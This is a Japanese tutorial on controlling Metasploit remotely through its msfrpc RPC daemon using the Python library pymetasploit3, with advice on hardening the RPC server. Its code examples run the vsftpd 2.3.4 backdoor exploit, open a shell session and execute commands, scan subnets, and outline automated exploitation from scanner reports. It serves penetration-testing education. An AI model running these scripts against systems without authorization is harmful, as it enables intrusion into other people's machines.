msfrpc 徹底解説: Metasploit を自動化・リモート操作する 🚀

はじめに：msfrpcとは？ 🤔

Metasploit Framework (MSF) は、世界で最も広く利用されているペネトレーションテストツールの1つです。msfconsoleというインタラクティブなコンソールが有名ですが、MSFにはmsfrpc (Metasploit Framework Remote Procedure Call) という強力な機能が備わっています。

msfrpcは、HTTPベースのリモートプロシージャコール (RPC) サービスを提供し、外部のアプリケーションやスクリプトからMetasploitの機能をプログラム的に制御することを可能にします。これにより、以下のようなメリットが生まれます。

• 自動化: 定型的なタスク（脆弱性スキャン、エクスプロイトの試行、レポート作成など）をスクリプト化し、効率化できます。
• リモート操作: 別のマシンからMetasploitインスタンスを操作できます。例えば、リソースの少ないマシンから強力なサーバー上のMetasploitを制御するなど。
• 他のツールとの連携: 脆弱性スキャナや他のセキュリティツールと連携し、より高度なワークフローを構築できます。
• カスタムインターフェース: 独自のWebインターフェースやダッシュボードを開発し、Metasploitの機能を特定のニーズに合わせて利用できます。

msfrpcは、MessagePackまたはJSON形式で通信を行います。Rubyで書かれているMetasploitと最も親和性が高いのはRubyですが、Python、Java、Cなど、HTTPSとMessagePack/JSONをサポートする多くの言語で利用可能です。この記事では、特にPythonを使ったmsfrpcの活用方法を中心に解説していきます。

msfrpcサーバー (msfrpcd) の起動 サーバーの準備 ⚙️

msfrpcを利用するには、まずRPCサーバーであるmsfrpcd (Metasploit Framework RPC Daemon) を起動する必要があります。msfrpcdは、クライアントからの接続を受け付け、Metasploitの機能へのアクセスを提供します。

msfrpcdはMetasploit Frameworkに含まれており、通常はMetasploitのインストールディレクトリ内で実行します。Kali Linuxなどではパスが通っている場合もあります。

基本的な起動コマンド

最も基本的な起動コマンドは以下の通りです。

msfrpcd -U <ユーザー名> -P <パスワード>
      

• -U <ユーザー名>: RPCサーバーへの接続に使用するユーザー名を指定します。
• -P <パスワード>: RPCサーバーへの接続に使用するパスワードを指定します。

⚠️ 重要: 必ずユーザー名とパスワードを設定してください。認証なしで起動すると、誰でもMetasploitを操作できてしまい、非常に危険です。

主要なオプション

msfrpcdには様々なオプションがあり、挙動をカスタマイズできます。

起動例

例として、ユーザー名 `msfuser`、パスワード `secretpassword` で、ローカルホスト (127.0.0.1) のポート 55553 で、SSLを有効にしてフォアグラウンドで起動する場合のコマンドは以下のようになります。

msfrpcd -U msfuser -P secretpassword -a 127.0.0.1 -p 55553 -f
      

起動すると、以下のようなメッセージが表示されます（バージョンによって多少異なります）。

[*] MSF RPC Daemon Started
[*] Starting RPC server on 127.0.0.1:55553 (SSL)...
[*] RPC server started on host 127.0.0.1, port 55553, URI /api/
[*] RPC Username: 'msfuser'
[*] RPC Password: 'secretpassword'
      

起動確認

バックグラウンドで起動した場合、プロセスが実行されているか確認できます。

ps aux | grep msfrpcd
      

また、`netstat` や `ss` コマンドで指定したポートがリッスン状態になっているか確認することもできます。

# netstatを使用する場合
sudo netstat -tulnp | grep 55553

# ssを使用する場合
sudo ss -tulnp | grep 55553
      

msfconsole からの起動 (msgrpc プラグイン)

msfrpcd を直接実行する代わりに、msfconsole 内で `msgrpc` プラグインをロードすることでもRPCサーバーを起動できます。

msfconsole
msf6 > load msgrpc Pass=yourpassword ServerHost=127.0.0.1 ServerPort=55553 User=msfuser SSL=true
[*] MSGRPC Service: 127.0.0.1:55553 (SSL)
[*] MSGRPC Username: msfuser
[*] MSGRPC Password: yourpassword
[*] Successfully loaded plugin: msgrpc
msf6 >
      

この方法では、msfconsole を起動している間だけRPCサーバーが動作します。オプションはmsfrpcdと似ていますが、`ServerHost`, `ServerPort`, `User`, `Pass`, `SSL` といった形式で指定します。

注: msgrpcプラグインを使用した場合、デフォルトのポート番号は `55552` となることがあります。msfrpcdのデフォルト `55553` とは異なる場合があるので注意が必要です。

msfrpcクライアントの利用：Python (pymetasploit3) 編 🐍

msfrpcdサーバーが起動したら、クライアントから接続してMetasploitを操作できます。様々な言語でクライアントを実装できますが、ここではPythonのライブラリ pymetasploit3 を使った方法を中心に解説します。

pymetasploit3は、Metasploit RPC API (MessagePack形式) をPythonから簡単に利用できるようにするためのライブラリです。元々存在した `pymetasploit` (Python 2向け) をPython 3向けにフォークし、改良されたものです (2019年頃に登場)。

pymetasploit3 のインストール

pipを使って簡単にインストールできます。

pip install pymetasploit3
# または pip3 install pymetasploit3
      

仮想環境 (venvやpipenv) を利用することを推奨します。

# 例: venv を使う場合
python3 -m venv msf-env
source msf-env/bin/activate
pip install pymetasploit3
      

msfrpcdへの接続

`MsfRpcClient` クラスを使ってmsfrpcdサーバーに接続します。

from pymetasploit3.msfrpc import MsfRpcClient

# msfrpcd への接続 (デフォルトポート 55553, SSL有効)
client = MsfRpcClient('secretpassword', username='msfuser', server='127.0.0.1', port=55553, ssl=True)

# msgrpc プラグインへの接続 (デフォルトポート 55552, SSL有効)
# client = MsfRpcClient('yourpassword', username='msfuser', server='127.0.0.1', port=55552, ssl=True)

# 接続確認 (認証が成功すると True が返る)
if client.authenticated:
    print("✅ 接続成功！")
else:
    print("❌ 接続失敗...")
    exit()

# 接続を切断する場合
# client.logout()
      

• 第1引数: パスワード
• username: ユーザー名
• server: msfrpcdが動作しているIPアドレスまたはホスト名
• port: msfrpcdが待ち受けているポート番号
• ssl: SSL/TLSを使用するかどうか (True/False)

接続に成功すると、`client` オブジェクトを通じて様々なMetasploitの機能にアクセスできます。

基本的なAPI操作例

`client` オブジェクトは、Metasploitの機能ごとにモジュール化されています。`dir(client)` を実行すると利用可能なモジュールを確認できます。

# 利用可能なモジュール一覧 (一部抜粋)
print([m for m in dir(client) if not m.startswith('_')])
# ['auth', 'authenticated', 'call', 'client', 'consoles', 'core', 'db', 'jobs', 'login', 'logout', 'modules', 'plugins', 'port', 'server', 'sessions', 'ssl', 'token', 'uri']
      

主なモジュールとその機能は以下の通りです。

Metasploitのバージョン情報を取得

core_version = client.core.version()
print(f"Metasploit Version: {core_version.get('version')}")
print(f"Ruby Version: {core_version.get('ruby')}")
print(f"API Version: {core_version.get('api')}")
      

利用可能な Exploit モジュールの一覧を取得

exploits = client.modules.exploits
print(f"利用可能なExploitモジュール数: {len(exploits)}")
# 最初の10個を表示
print("Exploitモジュール (最初の10個):")
for exploit_name in exploits[:10]:
    print(f"- {exploit_name}")
      

同様に、`client.modules.auxiliary`, `client.modules.payloads`, `client.modules.post` などで他のタイプのモジュール一覧も取得できます。

特定の Auxiliary モジュールの情報を取得

# 例: SMB共有を列挙するモジュール
module_type = 'auxiliary'
module_name = 'scanner/smb/smb_enumshares'

aux_module = client.modules.use(module_type, module_name)

# モジュールの説明
print(f"\nモジュール [{module_name}] の情報:")
print(f"説明: {aux_module.description}")

# 必須オプションの確認
print("\n必須オプション:")
for option in aux_module.required:
    print(f"- {option}")

# すべてのオプションと現在の設定値
# print("\nすべてのオプション:")
# for key, value in aux_module.options.items():
#     print(f"- {key}: {value}")

# オプションの設定例 (RHOSTSを設定)
# aux_module['RHOSTS'] = '192.168.1.100'
# print(f"\nRHOSTS設定後: {aux_module['RHOSTS']}")
      

Auxiliary モジュールの実行

# scanner/smb/smb_enumshares モジュールを実行する例
module_type = 'auxiliary'
module_name = 'scanner/smb/smb_enumshares'
target_host = '192.168.1.105' # ターゲットのIPアドレスに変更してください

print(f"\n[{module_name}] を実行します (ターゲット: {target_host})")

aux_module = client.modules.use(module_type, module_name)
aux_module['RHOSTS'] = target_host
# 必要に応じて他のオプションも設定
# aux_module['SMBUser'] = 'username'
# aux_module['SMBPass'] = 'password'

# モジュールを実行し、ジョブIDを取得
# execute() はジョブ情報を返す辞書を返す
job_info = aux_module.execute()
job_id = job_info.get('job_id')
uuid = job_info.get('uuid') # UUIDも取得できる

if job_id is not None:
    print(f"✅ モジュールがジョブとして開始されました。Job ID: {job_id}, UUID: {uuid}")

    # ジョブの状態を確認 (オプション)
    import time
    while True:
        job_status = client.jobs.info(job_id)
        print(f"  ジョブ {job_id} の状態: {job_status.get('status', '不明')}")
        if job_status.get('status') in ['completed', 'failed', None]: # Noneはジョブが見つからない場合など
            break
        time.sleep(5) # 5秒待機

    print(f"ジョブ {job_id} が完了または失敗しました。")
    # 必要であればジョブの結果を取得・処理する (詳細はAPIドキュメント参照)

else:
    print("❌ モジュールの実行に失敗しました。")
    print(f"  エラー情報: {job_info.get('error_message', '不明')}")

      

execute() メソッドはモジュールをバックグラウンドジョブとして実行します。結果はすぐには返ってきません。ジョブの進捗や結果を確認するには、client.jobs モジュールを使用します。

Exploit モジュールの実行とセッションの確認

# 例: vsftpd 2.3.4 のバックドア Exploit を試行
exploit_type = 'exploit'
exploit_name = 'unix/ftp/vsftpd_234_backdoor'
target_host = '192.168.1.106' # 脆弱なターゲットのIPアドレスに変更してください
payload_name = 'cmd/unix/interact' # 使用するペイロード

print(f"\n[{exploit_name}] を実行します (ターゲット: {target_host}, ペイロード: {payload_name})")

exploit_module = client.modules.use(exploit_type, exploit_name)
payload = client.modules.use('payload', payload_name)

exploit_module['RHOSTS'] = target_host
# exploit_module['RPORT'] = 21 # 必要であればポート指定

# Exploitを実行 (ペイロードも指定)
# ここでは execute() に payload オプションを渡す
exploit_job_info = exploit_module.execute(payload=payload)
exploit_job_id = exploit_job_info.get('job_id')

if exploit_job_id is not None:
    print(f"✅ Exploitジョブが開始されました。Job ID: {exploit_job_id}")

    # しばらく待機してセッションが確立されたか確認
    import time
    print("セッション確立を待機中...")
    time.sleep(15) # 適切な待機時間を設定

    sessions = client.sessions.list
    if sessions:
        print("\n🎉 セッションが確立されました！")
        for session_id, session_info in sessions.items():
            print(f"  Session ID: {session_id}")
            print(f"    タイプ: {session_info.get('type')}")
            print(f"    ターゲット: {session_info.get('session_host')}:{session_info.get('session_port')}")
            print(f"    経由: {session_info.get('via_exploit')} / {session_info.get('via_payload')}")

            # セッション上でコマンドを実行する例 (IDが '1' の場合)
            if session_id == '1': # 実際には取得したIDを使う
                shell = client.sessions.session(session_id)
                shell.write('id\n') # コマンドを送信
                time.sleep(2) # コマンド実行と応答受信のための待機
                output = shell.read() # 応答を読み取り
                print("\n  セッション '1' で 'id' コマンドを実行:")
                print(output)

                # セッションを終了する場合
                # shell.stop()
                # print(f"\nセッション {session_id} を終了しました。")
    else:
        print("\n❌ セッションは確立されませんでした。")

else:
    print("❌ Exploitジョブの開始に失敗しました。")
    print(f"  エラー情報: {exploit_job_info.get('error_message', '不明')}")

      

Exploitの実行も通常はジョブとして投入されます。成功すると、client.sessions.list で確立されたセッションを確認できます。client.sessions.session(<session_id>) で特定のセッションオブジェクトを取得し、.write() でコマンド送信、.read() で結果の読み取りが可能です。

実践的なユースケース 🎯

msfrpc とクライアントライブラリ (pymetasploit3 など) を組み合わせることで、様々な自動化・連携が可能になります。

1. 脆弱性スキャン結果からの自動エクスプロイト試行

Nessus や OpenVAS などの脆弱性スキャナが出力したレポートを解析し、発見された脆弱性に対応する Metasploit モジュールを検索して自動的に実行するスクリプトを作成できます。

1. 脆弱性スキャンレポート (XML, CSVなど) をパースする。
2. 各脆弱性情報 (CVE ID, ポート番号、サービス名など) を抽出する。
3. 抽出した情報を基に、client.modules.search() などを使って関連する Exploit モジュールを検索する (ただし、pymetasploit3 に直接的な search メソッドはない可能性があるため、client.modules.exploits などで全リストを取得してフィルタリングするか、client.consoles 経由で search コマンドを実行する必要があるかもしれません)。
4. 見つかったモジュールに対して、レポートから得たターゲット情報 (IPアドレス、ポート) を設定する。
5. execute() を使って Exploit を試行する。
6. セッションが確立されたか client.sessions.list で確認し、結果をログに記録する。

これにより、大量のホストに対する初期アクセス試行を効率化できます。ただし、無差別な攻撃にならないよう、対象範囲や実行するモジュールを慎重に選定する必要があります。

2. 定型的なペネトレーションテスト作業の自動化

ペネトレーションテストで毎回行うような定型作業をスクリプト化できます。例えば、「特定のサブネットに対してポートスキャン (nmap連携 or auxiliary/scanner) → 特定ポートが開いていれば既知の脆弱性 (例: SMB, FTP) をチェックする Auxiliary モジュールを実行 → 結果をファイルに保存」といった一連の流れを自動化します。

# 擬似コード例
from pymetasploit3.msfrpc import MsfRpcClient
import subprocess
import json

client = MsfRpcClient('password', username='msfuser')

target_subnet = "192.168.1.0/24"

# 1. Nmapでポートスキャン (外部コマンド実行)
print(f"[*] Nmap スキャン開始: {target_subnet}")
try:
    nmap_output = subprocess.check_output(['nmap', '-p', '21,22,80,445', '-oG', '-', target_subnet], text=True)
except subprocess.CalledProcessError as e:
    print(f"[!] Nmap 実行エラー: {e}")
    nmap_output = ""

# 2. Nmap結果をパースしてターゲットリスト作成
targets = {} # {ip: [port1, port2], ...}
for line in nmap_output.splitlines():
    if "Ports:" in line and "Status: Up" in line:
        parts = line.split()
        ip = parts[1]
        ports = []
        port_section = line.split("Ports: ")[1]
        for p_info in port_section.split(", "):
            if "/open/" in p_info:
                port = p_info.split('/')[0]
                ports.append(int(port))
        if ports:
            targets[ip] = ports
print(f"[*] スキャン結果からアクティブなホスト: {list(targets.keys())}")

# 3. 特定ポートが開いているホストに対してAuxiliaryモジュールを実行
results = {}
for ip, ports in targets.items():
    results[ip] = {}
    if 445 in ports:
        print(f"[*] {ip}: SMBバージョン情報取得 (auxiliary/scanner/smb/smb_version)")
        smb_version = client.modules.use('auxiliary', 'scanner/smb/smb_version')
        smb_version['RHOSTS'] = ip
        job_info = smb_version.execute()
        # ... ジョブ完了待ち & 結果取得処理 (省略) ...
        results[ip]['smb_version'] = "実行中 (結果は別途確認)" # 本来は結果を取得

    if 21 in ports:
        print(f"[*] {ip}: FTP匿名ログイン試行 (auxiliary/scanner/ftp/anonymous)")
        ftp_anon = client.modules.use('auxiliary', 'scanner/ftp/anonymous')
        ftp_anon['RHOSTS'] = ip
        job_info = ftp_anon.execute()
        # ... ジョブ完了待ち & 結果取得処理 (省略) ...
        results[ip]['ftp_anonymous'] = "実行中 (結果は別途確認)"

# 4. 結果をファイルに保存
print("[*] 結果を result.json に保存します")
with open("result.json", "w") as f:
    json.dump(results, f, indent=2)

print("[*] 自動化スクリプト完了")

          

3. カスタムダッシュボードやレポートツールの作成

Flask や Django といった Web フレームワークと pymetasploit3 を組み合わせることで、Metasploit の情報を表示・操作するための独自の Web アプリケーションを作成できます。

• 現在アクティブなセッション一覧と詳細情報をリアルタイムに表示するダッシュボード。
• 実行中のジョブとその進捗状況を表示するパネル。
• 特定のホストに関する情報 (スキャン結果、確立されたセッションなど) をまとめて表示するページ。
• ボタンクリックで特定の Auxiliary モジュールや Post モジュールを実行するインターフェース。
• 収集した情報を基にカスタムレポート (HTML, PDF) を生成する機能。

これにより、チームメンバーが必要な情報にアクセスしやすくなったり、特定のタスクを実行しやすくなったりします。

4. 他のセキュリティツールとの連携

msfrpc API を介して、他のツールと Metasploit を連携させることができます。

• SIEM連携: Metasploit でセッションが確立されたり、特定のイベントが発生したりした場合に、その情報を SIEM (Security Information and Event Management) システムに送信する。
• 脅威インテリジェンス連携: 脅威インテリジェンスフィードから得られた悪意のある IP アドレスやドメインに対して、自動的に Metasploit のスキャンモジュールを実行する。
• インシデントレスポンス連携: インシデントレスポンスプラットフォームからトリガーを受け取り、侵害された可能性のあるホストに対して Metasploit の Post モジュール (情報収集、永続化解除など) を実行する。

これらの連携により、セキュリティ運用全体の自動化と効率化を図ることができます。

セキュリティに関する注意点 ⚠️

msfrpcは非常に強力な機能ですが、設定や運用を誤ると深刻なセキュリティリスクになり得ます。以下の点に十分注意してください。

1. 強力な認証情報の設定

• -U と -P オプションで、推測されにくい複雑なユーザー名とパスワードを設定してください。
• デフォルトの認証情報 (例: `msf`/`msf`) や簡単なパスワードは絶対に使用しないでください。
• 認証情報は安全な場所に保管し、不必要に共有しないでください。

2. SSL/TLSの強制使用

• デフォルトではmsfrpcdはSSL/TLSを有効にして起動します。-Sオプションで無効にしないでください。
• SSL/TLSにより、クライアントとサーバー間の通信が暗号化され、認証情報や実行コマンドが盗聴されるのを防ぎます。
• 自己署名証明書ではなく、信頼できる認証局 (CA) によって署名された証明書を使用することが理想的ですが、環境によっては自己署名証明書でも最低限の暗号化は提供されます（クライアント側での証明書検証の設定が必要になる場合があります）。

3. ネットワークアクセス制御

• 待ち受けアドレスの限定: -a オプションで、msfrpcdが待ち受けるIPアドレスを可能な限り限定してください。ローカルマシンからのみアクセスする場合は 127.0.0.1 を指定します。特定のクライアントマシンからのみアクセスを許可する場合は、そのクライアントが接続してくるネットワークインターフェースのIPアドレスを指定します。0.0.0.0 (全インターフェース) での待ち受けは、必要な場合を除き避けるべきです。
• ファイアウォール: サーバーのホストベースファイアウォール (iptables, ufw, firewalld など) やネットワークファイアウォールで、msfrpcdが使用するポート (デフォルト: 55553) へのアクセスを、許可されたクライアントIPアドレスからのみに制限してください。

4. 実行ユーザー権限の最小化

• msfrpcdをroot権限で実行することは避けてください。専用の一般ユーザーアカウントを作成し、そのユーザーでmsfrpcdを実行することを推奨します。
• これにより、万が一msfrpcd自体に脆弱性があった場合に、攻撃者が得られる権限を制限することができます。

5. 定期的なアップデート

• Metasploit Frameworkは頻繁にアップデートされます。msfrpcdを含むMetasploit Frameworkを常に最新の状態に保ち、既知の脆弱性に対処してください。

6. APIトークンの管理 (該当する場合)

• 一部のAPI連携では、パスワードの代わりに永続的なAPIトークンを使用できます。
• これらのトークンはパスワードと同様に機密情報として扱い、安全に管理してください。
• 不要になったトークンは削除してください。
• Metasploit Proなどでは、トークンの生成・管理機能が提供されています。

まとめ ✨

msfrpcは、Metasploit Frameworkの強力な機能を外部からプログラム的に制御するためのインターフェースです。msfrpcdサーバーを適切に設定・起動し、pymetasploit3などのクライアントライブラリを使用することで、以下のような多くのメリットを享受できます。

• 自動化による効率向上: 定型作業をスクリプト化し、時間と労力を節約できます。
• リモートからの柔軟な操作: 場所を選ばずにMetasploitインスタンスを制御できます。
• ツール連携による高度化: 他のセキュリティツールと組み合わせ、より洗練されたワークフローを構築できます。
• カスタムソリューション開発: 特定のニーズに合わせた独自のツールやインターフェースを作成できます。

一方で、msfrpcは強力な機能であるがゆえに、セキュリティリスクも伴います。認証の強制、SSL/TLSによる暗号化、厳格なアクセス制御は必須です。これらの対策を怠ると、Metasploitが悪用される危険性が高まります。

この記事では、msfrpcdの起動方法、Pythonライブラリpymetasploit3を用いた基本的な使い方、実践的なユースケース、そして重要なセキュリティ上の注意点について解説しました。msfrpcを安全かつ効果的に活用し、ペネトレーションテストやセキュリティ評価の自動化・効率化に役立ててください。😊

さらに深く学びたい場合は、Metasploitの公式ドキュメントや、利用するクライアントライブラリのドキュメントを参照することをお勧めします。

参考情報 📚

• Metasploit Framework – Kali Linux Tools: https://www.kali.org/tools/metasploit-framework/

  Kali LinuxにおけるMetasploit Frameworkの概要ページ。msfrpcdについても触れられています。

• Metasploit Documentation – RPC API: https://docs.metasploit.com/docs/using-metasploit/advanced/rpc/rpc-api.html

  Rapid7による公式のRPC APIドキュメント。サーバーの起動方法、認証、API呼び出しについて詳細に説明されています。(情報はdocs.metasploit.com や metasploit.help.rapid7.com など複数の場所に分散している可能性があります)

• pymetasploit3 – PyPI: https://pypi.org/project/pymetasploit3/

  Pythonライブラリ pymetasploit3 のPyPIページ。インストール方法や基本的な使い方の例が記載されています (最終更新: 2019年)。

• pymetasploit3 – GitHub (DanMcInerney): https://github.com/DanMcInerney/pymetasploit3

  pymetasploit3 の GitHub リポジトリ。ソースコードや詳細な使用例を確認できます。